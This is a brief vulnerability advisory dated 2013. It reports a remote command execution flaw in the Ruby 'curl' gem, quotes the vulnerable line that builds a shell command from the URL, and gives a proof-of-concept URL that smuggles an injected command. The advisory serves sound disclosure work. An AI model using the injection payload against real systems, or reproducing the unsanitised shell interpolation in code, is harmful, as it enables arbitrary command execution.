Ruby Gem Curl suffers from a remote command execution vulnerability due to a lack of user input sanitization.
c96fc864359b4f3b2f30998551d780075c8307fbf1c24791422f696b650146ef
Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl
Specially crafted URLs can result in remote code execution:
In ./lib/curl.rb the following lines:
131 cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref} \"{url}\" "
132 if @debug
133 puts cmd.red
134 end
135 result = open_pipe(cmd)
PoC:
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
Larry W. Cashdollar
@_larry0
http://vapid.dhs.org